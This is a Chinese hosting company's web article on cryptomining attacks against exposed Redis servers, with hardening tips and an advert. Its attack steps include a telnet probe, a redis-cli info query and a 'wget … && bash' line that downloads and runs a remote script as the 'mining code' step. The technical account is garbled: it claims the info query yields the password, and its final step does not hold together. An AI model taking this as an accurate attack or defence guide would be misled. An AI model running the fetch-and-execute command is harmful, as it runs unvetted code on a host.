Redis漏洞挖矿黑客攻击窃取越来越多（redis漏洞挖矿程序）

Redis漏洞挖矿：黑客攻击窃取越来越多

Redis是一个开源的内存数据结构存储系统，被广泛应用于 Web 缓存、分布式会话、消息队列等场景中。随着 Redis 应用的普及，其也成为了黑客攻击的目标之一。近期，国内外多个机构相继发布 Redis 漏洞挖矿事件的报告，黑客利用 Redis 漏洞进行挖矿，窃取大量的计算机性能资源及个人信息数据。

Redis 漏洞原理

Redis 漏洞产生的原因，主要是基于Redis默认情况下会绑定所有IP地址，开放6379端口，未加安全验证功能，同时在官方文档也没有强调安全措施的必要性，因此在网络上早期就被揭示出其“危险性”。

黑客利用漏洞的过程，可以简单分为以下几步：

1. 探测VPS服务器是否有Redis服务及其版本。

telnet IP地址(如：127.0.0.1) Redis端口（默认6379）

2. 扫描Redis信息，获取Redis的密码及版本等信息。

echo info|redis-cli -h IP地址 -a Redis密码 -p 端口 

3. 注入挖矿代码，同步进行挖矿操作。

wget  http://download.bt.cn/tools/redis_mgr.sh && bash redis_mgr.sh

经过漏洞攻击之后，被攻击的Redis服务会开始进行挖矿操作，损耗 CPU 计算能力，严重到会导致机器瘫痪，可能会被彻底破坏或受到不可逆的损害。

如何防止Redis漏洞攻击

针对Redis漏洞攻击的实战解决方案，推荐以下几个建议：

1. 合理设置Redis访问密码：由于Redis服务器绑定了所有IP地址，因此设置访问密码是 Redis 服务器安全保护重要措施。修改文件/etc/redis.conf，在文件结尾添加requirepass密码，即可完成密码访问验证配置。

2. 使用Redis的最新版本：Redis的个别版本存在安全漏洞，如Redis 3.0.6/3.0.7版本等，因此Redis使用者可以在 官网（https://redis.io/download）上下载最新的安全版本，避免被攻击威胁。

3. 合理开启一些防御措施：在Redis的配置文件中开启不同的应用场景的配置文件选项，如限制内存使用、禁用命令等功能，增强Redis服务的安全性和保护能力。

4. 提高Redis服务初始安装时的安全性设置：可直接使用Redis安装包进行安装，然后随着业务发展和安全考虑，为 Redis 重新配置日志记录、网络安全、SSL/TLS 组件等信息，并加强 Redis 的访问权限。

结论

针对 Redis 漏洞挖矿的攻击事件，要充分认识 Redis 服务安全保护的必要性，以更高效、更规范的方法加强 Redis 服务的安全性能，在日常运维中定期监控 Redis 服务的运行状况、升级最新版本，提高服务安全性和保护能力，在保障用户数据安全的同时，保障自身安全完整性。

创新互联（cdcxhl.com）提供稳定的云服务器,香港云服务器,BGP云服务器,双线云服务器,高防云服务器,成都云服务器,服务器托管。精选钜惠，欢迎咨询：028-86922220。

新闻标题：Redis漏洞挖矿黑客攻击窃取越来越多（redis漏洞挖矿程序）
本文网址：http://www.mswzjz.cn/qtweb/news35/336435.html

温江区贝锐智能技术服务部_成都网站建设公司，为您提供标签优化、网站策划、网站改版、网站营销、微信公众号、外贸网站建设

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 贝锐智能